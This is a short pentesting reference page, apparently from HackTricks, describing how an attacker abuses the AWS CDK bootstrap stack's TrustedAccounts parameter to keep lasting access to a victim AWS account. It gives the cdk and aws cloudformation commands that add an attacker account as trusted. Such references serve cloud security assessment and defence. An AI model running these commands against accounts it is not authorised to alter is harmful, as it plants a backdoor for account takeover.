# AWS - Cloudformation Persistence

{{#include ../../../../banners/hacktricks-training.md}}

## CloudFormation

For more information, access:

{{#ref}}
../../aws-services/aws-cloudformation-and-codestar-enum.md
{{#endref}}

### CDK Bootstrap Stack

The AWS CDK deploys a CFN stack called `CDKToolkit`. This stack supports a parameter `TrustedAccounts` which allow external accounts to deploy CDK projects into the victim account. An attacker can abuse this to grant themselves indefinite access to the victim account, either by using the AWS cli to redeploy the stack with parameters, or the AWS CDK cli.

```bash
# CDK
cdk bootstrap --trust 1234567890

# AWS CLI
aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890
```

{{#include ../../../../banners/hacktricks-training.md}}